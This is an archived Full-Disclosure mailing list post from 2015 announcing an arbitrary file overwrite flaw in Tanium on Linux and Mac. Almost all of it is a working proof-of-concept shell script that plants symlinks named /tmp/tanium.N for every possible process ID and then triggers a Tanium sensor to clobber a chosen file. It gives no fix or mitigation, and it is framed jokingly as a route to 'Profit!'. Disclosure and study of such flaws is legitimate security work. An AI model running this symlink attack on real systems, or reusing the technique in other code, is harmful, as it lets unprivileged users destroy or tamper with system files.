lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 4 Jun 2015 12:24:00 -0000 From: reek35@...l2tor.com To: fulldisclosure@...lists.org Subject: [FD] [CVE-2015-1234] Tanium all versions arbitrary file overwrite ############################################################## # # # TANIUM ALL VERSIONS ARBITRARY FILE OVERWRITE # # # # TANIUM allows lowest privileged users on # # Linux and Mac systems to overwrite any file # # of their choosing in 15 seconds. # # # # Impossible? Think again. # # # ############################################################## Step 1: #!/bin/sh i=0; j=$(cat /proc/sys/kernel/pid_max) while true; do ln -s $1 /tmp/tanium.$i [ $i -eq $j ] && break i=$((i+1)) done Step 2: Execute Established Connections sensor. Step 3: ??? Step 4: Profit! _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/